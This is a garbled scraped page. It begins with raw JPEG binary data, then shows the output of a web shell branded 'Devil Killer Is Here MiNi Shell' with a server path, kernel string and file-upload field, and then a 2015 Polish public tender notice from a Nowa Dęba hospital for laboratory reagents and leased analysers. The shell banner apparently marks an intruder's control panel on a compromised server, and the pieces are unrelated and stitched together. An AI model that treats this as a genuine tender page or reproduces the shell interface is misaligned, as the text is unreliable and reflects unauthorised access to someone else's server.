JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151209/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151209/336920-N-2015.html

<p class="kh_header"><b>Nowa Dęba: DOSTAWA ODCZYNNIKÓW LABORATORYJNYCH ORAZ DZIERŻAWA APARATÓW dla Szpitala Powiatowego  w Nowej Dębie</b><br>
<b>Numer ogłoszenia: 336920 - 2015; data zamieszczenia: 09.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej w Nowej Dębie , ul. M. C. Skłodowskiej 1a, 39-460 Nowa Dęba, woj. podkarpackie, tel. 15 8462651 w. 120.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zoznowadeba.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA ODCZYNNIKÓW LABORATORYJNYCH ORAZ DZIERŻAWA APARATÓW dla Szpitala Powiatowego  w Nowej Dębie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> DOSTAWA ODCZYNNIKÓW LABORATORYJNYCH ORAZ DZIERŻAWA APARATÓW dla Szpitala Powiatowego  w Nowej Dębie 
Szczegółowy opis przedmiotu zamówienia stanowi Załącznik nr 1do SIWZ - Formularz Asortymentowo - Cenowy oraz Załącznik nr 2 do SIWZ -  Parametry techniczno-użytkowe aparatu do SIWZ.
Dostawę przedmiotu zamówienia do siedziby Zamawiającego zapewnia Wykonawca, ponosząc koszty i ryzyko transportu. 
Wykonawca może składać ofertę na całość lub wybrane przez siebie poszczególne części (PAKIETY) .

 Wykonawca którego oferta zostanie wybrana jako najkorzystniejsza będzie zobowiązany do dostarczenia    
 aparatu w ramach dzierżawy ponosząc koszty i ryzyko transportu, montaż oraz uruchomienie wraz ze  
 szkoleniem personelu zgodnie z zapisami dotyczącymi danego Pakietu.

 Wykonawca zobowiązany jest do przekazania Zamawiającemu szczegółowych instrukcji obsługi w języku   
 polskim oraz konserwacji dla każdego dostarczonego aparatu.

       Natomiast asortyment, ilość i terminy dostaw odczynników będą określane na piśmie przesłane faxem lub 
       e-mailem na numer / adres  Wykonawcy na max 10 dni wcześniej przed terminem dostawy.
       W razie reklamacji ilościowych bądź jakościowych Wykonawca będzie je uwzględniał na swój koszt w ciągu 
       7 dni licząc od daty zgłoszenia reklamacji.
       Wykonawca będzie przyjmował reklamacje jakościowe bez względu na termin zakupu, jednak nie później niż 
       przed upływem terminu ważności.
     
       Wykonawca, którego oferta zostanie uznana za najkorzystniejszą, będzie zobowiązany do udzielenia gwarancji 
       na  dostarczony w ramach dzierżawy aparat  przez okres obowiązywania umowy i będzie ponosić wszelkie   
       koszty związane z naprawami gwarancyjnymi.

       Zaoferowane przez Wykonawców w niniejszym postępowaniu wyroby, muszą spełniać  wymagania  określone       
       ustawą z dnia 20 maja 2010r. o wyrobach medycznych ((tekst jednolity: Dz.U. z 2015r. poz.876)
       tj. certyfikat CE lub  deklarację zgodności (jeśli prawo nakłada obowiązek posiadania takich dokumentów).

       Po zakończeniu okresu obowiązywania umowy wydzierżawiony aparat zostanie zwrócony Wykonawcy.

       Zamówienie obejmuje 19 Pakietów  - części (dopuszcza się składanie ofert częściowych na poszczególne 
       Pakiety lub na całość  zamówienia).
         Części zamówienia:
         
        PAKIET  Nr 1 -  Dostawa odczynników wraz z dzierżawą analizatora biochemicznego w systemie suchej 
                               chemii;

        PAKIET  Nr 2 -  Dostawa odczynników wraz z dzierżawą aparatu do wykonywania badań immunochemicznych 
                               i wirusologicznych;
                         
        PAKIET Nr 3  -   Dostawa odczynników wraz z dzierżawą czytnika do pasków moczu;

        PAKIET Nr 4   -  Dostawa odczynników wraz z dzierżawą aparatury niezbędnej do oznaczania hemoglobiny 
                               glinowanej HbA1c;

        PAKIET Nr 5  -  Dostawa odczynników do oznaczeń immunotransfuzjologicznych mikrometodą kolumnową do    
                               posiadanego sprzętu Diamed ID-System z doposażeniem;

        PAKIET  Nr 6  -  Dostawa odczynników wraz z dzierżawą aparatu do badania krwi metodą immunochemiczną;
 
        PAKIET  Nr 7  - Dostawa odczynników wraz z dzierżawą aparatu do wykonywania badań równowagi kwasowo-
                              Zasadowej;
         PAKIET Nr 8   -  Dostawa odczynników wraz z dzierżawą aparatu do badań hematologicznych ;

         PAKIET Nr 9   -  Dostawa odczynników do oznaczeń Borrelia IgM i IgG - test potwierdzenia (WB) wraz 
                                 z dzierżawą  sprzętu służącego do odczytu tych oznaczeń ;
           
        PAKIET Nr 10  -  Dostawa odczynników wraz z dzierżawą aparatury niezbędnej do badań paneli alergicznych i     
                                 autoimmunologicznych ;
                         
        PAKIET  Nr 11  - Odczynniki monoklonalne do serologii grup krwi; 

       PAKIET  Nr 12  - Odczynniki do serologii grup krwi;                     

       PAKIET Nr 13  - Odczynnik do badania do badania w kierunku kiły;

       PAKIET Nr 14  - Odczynniki do koagulologii na aparat KSELMED 3002 OPTIC - ozn. Wykonywane met.mikro 
                               w dubletach;                                                        

       PAKIET Nr 15  - Odczynniki do analityki ogólnej;                        
 
       PAKIET Nr 16 - Odczynniki  do analizatora hematologicznego SWELAB AC 900 i odczynnik  do rozmazów krwi;                           
                                                                                             
  
       PAKIET Nr 17 - Odczynniki gotowe- Chemia kliniczna- aparat STAT-FAX 1904; 

       PAKIET Nr 18 - Szybkie testy latexsowe i diagnostyczne;           
 
       PAKIET Nr 19 -  Odczynniki i podłoża;.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.69.61.00-6, 33.69.62.00-7, 33.69.63.00-8, 38.43.40.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 19.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczegółowego warunku w tym zakresie. Ze względu na charakter przedmiotu zamówienia nie żąda od Wykonawców dodatkowych dokumentów w celu wykazania, iż spełniają w/w warunek.Za spełnienie powyższego warunku Zamawiający uzna złożenie oświadczenia przedstawionego przez Wykonawcę wraz z ofertą - wg wzoru na Załączniku nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) Oświadczenie o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust.1 
                ustawy Pzp - zgodnie z Załącznikiem nr 4  do SIWZ;

            b) Jeżeli Wykonawca, zgodnie z art. 26 ust.2b ustawy, polega na wiedzy i doświadczeniu, potencjale 
                 technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub 
                 ekonomicznych innych podmiotów( niezależnie od  charakteru prawnego łączących go z nimi 
                 stosunków), zobowiązany jest udowodnić Zamawiającemu iż będzie dysponował tymi zasobami w 
                 trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie 
                 tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonywania 
                 zamówienia, z uwzględnieniem następujących informacji:
1)	zakresu dostępnych Wykonawcy zasobów innego podmiotu,
2)	sposobu wykorzystania przez Wykonawcę zasobów innego podmiotu, przy wykonywaniu zamówienia,
                 3)   charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem,
                 4)   zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.
             
             c) Jeżeli Wykonawca, wykazując spełnienie warunków, o których mowa w art.22 ust.1 ustawy, polega 
                  na zasobach innych podmiotów na zasadach określonych w pkt.b, a podmioty te będą brały udział w 
                  realizacji części zamówienia, Wykonawca w odniesieniu do tych podmiotów zobowiązany jest złożyć 
                  dokumenty wymienione w ust.2 pkt. a i b.
          
             d) Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw 
                      w okresie  ostatnich trzech lat  przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest 
                      krótszy - w tym okresie, wraz z podaniem ich wartości , przedmiotu, dat wykonania i podmiotów, na rzecz których 
                      dostawy zostały wykonane, oraz załączeniem dokumentów, czy zostały wykonane lub są wykonywane należycie; 

        Zamawiający  uzna warunek za spełniony, jeżeli Wykonawca wykaże że, zrealizował min 2 zamówienia na dostawę 
        o charakterze co do przedmiotu jak i wartości zamówienia w zależności od wybranego pakietu.
      Wykonawca zobowiązany jest do załączenia do oferty  dokumentów potwierdzających należyte 
      wykonanie zamówienia (referencje).  
                      Dokument ten będzie potwierdzeniem, że Wykonawca posiada doświadczenie w zakresie realizacji 
                  dostaw  będących przedmiotem zamówienia.
                  W przypadku podmiotów składających ofertę wspólną Zamawiający uzna, że Wykonawcy spełniają 
                  w/w warunek, jeżeli wykażą, że wykonali łącznie wymaganą liczbę dostaw w danym pakiecie .</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczegółowego warunku w tym zakresie. Ze względu na charakter przedmiotu zamówienia nie żąda od Wykonawców dodatkowych dokumentów w celu wykazania, iż spełniają w/w warunek.Za spełnienie powyższego warunku Zamawiający uzna złożenie oświadczenia przedstawionego przez Wykonawcę wraz z ofertą - wg wzoru na Załączniku nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczegółowego warunku w tym zakresie. Ze względu na charakter przedmiotu zamówienia nie żąda od Wykonawców dodatkowych dokumentów w celu wykazania, iż spełniają w/w warunek.Za spełnienie powyższego warunku Zamawiający uzna złożenie oświadczenia przedstawionego przez Wykonawcę wraz z ofertą - wg wzoru na Załączniku nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opłacona polisa, a przypadku jej braku inny dokument potwierdzający, że wykonawca jest 
                 ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z 
                 przedmiotem zamówienia, i  zobowiązuje się do utrzymania tego  ubezpieczenia przez  okres trwania umowy 
                 aktualna na dzień składania ofert, wraz z dowodem - potwierdzeniem wpłaty przy sumie gwarancyjnej  
                      nie mniejszej niż  30 000,00 zł .
                 Dokumenty te będą potwierdzeniem sytuacji ekonomicznej  i finansowej Wykonawcy, zapewniającej 
                 realizację dostaw zgodnych z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a)	w przypadku zakwalifikowania asortymentu jako wyrób medyczny - oświadczenie Wykonawcy, iż  zaoferowane wyroby 
       posiadają odpowiednie dokumenty ( Certyfikaty CE i deklaracje zgodności wyrobu medycznego przyporządkowane do 
       poszczególnych wyrobów) i są  one aktualne dla  przedmiotowego postępowania, oraz mogą być stosowane w służbie  
       zdrowia zgodnie z ustawą z dnia 20 maja 2010r. (tekst jednolity: Dz.U. z 2015r. poz.876 ) dla wyrobów 
       kwalifikowanych jako   wyroby  medyczne ( jeśli prawo nakłada obowiązek posiadania takich dokumentów) 
                      Zamawiający zastrzega sobie prawo żądania okazania przez Wykonawcę dokumentów dopuszczających zaoferowany 
                      asortyment do obrotu i stosowania.

      b)   Wykonawca jest zobowiązany do załączenia materiałów potwierdzających zgodność zaoferowanych 
            parametrów i konfiguracji przedmiotu zamówienia ( prospekty lub broszury lub wyciągi z instrukcji lub 
            foldery lub zdjęcia);</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej:
1.  Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium  Rzeczypospolitej Polskiej, zamiast dokumentów
     o których  mowa wyżej składa dokument  lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce 
     zamieszkania,  potwierdzające  odpowiednio, że:
               -  nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu 
                  składania ofert.
               -  nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
         2. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się
             dokumentów wskazanych w niniejszym pkt.1 zastępuje się je dokumentem zawierającym oświadczenie złożone przed 
             notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego 
             odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania -
             wystawionych nie wcześniej niż w terminach określonych w niniejszym pkt.1
              
b)Postanowienia dotyczące wnoszenia  oferty wspólnej przez dwa lub więcej podmioty gospodarcze ( konsorcja / 
         spółki cywilne) :
1.	Wykonawcy mogą  wspólnie ubiegać się o udzielenie zamówienia.
2.	Jeżeli oferta wspólna złożona przez dwóch lub więcej wykonawców zostanie wyłoniona w prowadzonym postępowaniu jako najkorzystniejsza przed podpisaniem umowy w sprawie zamówienia publicznego, Zamawiający zażąda w wyznaczonym terminie złożenia umowy regulującej współpracę tych wykonawców, podpisanej przez wszystkich partnerów , przy czym  termin, na jaki została zawarta, nie może być  krótszy niż termin realizacji zamówienia.
3.	Wykonawcy ustanawiają  pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy, a pełnomocnictwo / upoważnienie do pełnienia takiej funkcji 
wystawione zgodnie z wymogami ustawowymi, podpisane przez prawnie upoważnionych przedstawicieli  każdego z wykonawców winno być dołączone do oferty.
4.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia  ponoszą solidarną odpowiedzialność za wykonanie umowy. 
 
          Wykonawca udostępni Zamawiającemu w/w dokumenty na każde żądanie Zamawiającego.
        Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli wymaganych przez  
        Zamawiającego  oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1, lub którzy nie złożyli 
        pełnomocnictw, albo którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty, o których 
        mowa w art. 25 ust. 1, zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w 
        wyznaczonym terminie, chyba, że mimo ich złożenia oferta wykonawcy podlega odrzuceniu albo konieczne 
        byłoby unieważnienie postępowania; 
        Złożone na wezwanie Zamawiającego oświadczenia lub dokumenty powinny potwierdzać spełnianie przez 
        Wykonawcę warunków SIWZ -  udziału w postępowaniu oraz spełnianie przez oferowane dostawy, wymagań 
        określonych przez Zamawiającego, nie później niż w dniu w którym upłynął termin składania ofert.
        Zamawiający może wezwać do złożenia wyjaśnień w wyznaczonym przez siebie terminie, dotyczących 
        oświadczeń lub dokumentów, o których mowa w art. 25 ust.1.

          Dokumenty są  składane w  oryginale lub kopii  poświadczonej za zgodność  z  oryginałem  przez  Wykonawcę. 
          Wykonawca udostępni Zamawiającemu w/w dokumenty na każde żądanie Zamawiającego.
         c)  Wypełniony i podpisany  Załącznik nr 1 do SIWZ  - Formularz Asortymentowo-Cenowy  ( w zależności od wybranego                                        
              pakietu ).
              Zamawiający dopuszcza zmianę formy załącznika nr 1 przez Wykonawcę lecz zastrzega,  że  musi  zawierać  co 
              do treści wszystkie  dane podane we wzorze do SIWZ.
         d)  Wypełniony i podpisany Załącznik nr 2 do SIWZ - Parametry Techniczno-Użytkowe Aparatu ( w zależności od wybranego 
              pakietu)
         e) Wypełniony i podpisany formularz Załącznik nr 3 do SIWZ - Oferta  Wykonawcy( w zależności od wybranego  
              pakietu)
         f) Wypełniony i podpisany Załącznik nr 4 do SIWZ  - Oświadczenie o spełnieniu warunków udziału w postępowaniu
         g)  Wypełniony i podpisany Załącznik nr 5 do SIWZ  - Oświadczenie Wykonawcy o braku podstaw do  wykluczenia 
         h)  Wypełniony i podpisany  Załącznik nr 6 do SIWZ -  Oświadczenie dotyczące grupy kapitałowej
         i)  Parafowany na każdej stronie Załącznik nr 7 do SIWZ -   Wzór umowy  ( w zależności od wybranego pakietu)
         j)   Pełnomocnictwo  osoby / osób podpisujących ofertę do podejmowania zobowiązań w imieniu Wykonawcy, o ile nie 
               wynikają  z przepisów prawa lub innych dokumentów;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin płatności - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
